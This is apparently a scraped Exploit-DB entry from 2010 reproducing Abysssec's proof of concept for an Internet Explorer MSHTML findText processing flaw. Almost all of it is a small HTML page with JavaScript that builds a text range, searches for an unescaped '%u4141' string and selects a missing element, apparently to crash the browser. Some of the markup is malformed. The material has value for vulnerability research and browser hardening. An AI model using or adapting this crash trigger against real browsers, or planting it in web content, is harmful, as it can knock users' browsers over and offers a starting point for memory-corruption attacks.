Microsoft Internet Explorer – MSHTML Findtext Processing

  • 作者: Abysssec
    日期: 2010-09-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15122/
  • <html>
    <body>
    <input type="button" value="Crachme!" onclick="Search()"/>
    <inputtype="text" value="Abysssec" id="Abysssec">&lt;/textarea&gt;
    
    <script type="text/javascript">
    function Search(){
    var textinput= document.getElementById("Abysssec");
    
    var textRange = textinput.createTextRange();
    textRange.findText(unescape("%u4141"),-1);
    textRange.select(document.getElementById('d'));
    document.body.appendChild(textinput);
    }
    </script>
    <p id="p">Abysssec</p>
    http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
    </body>
    </html>
    </p>
    </body>
    </html>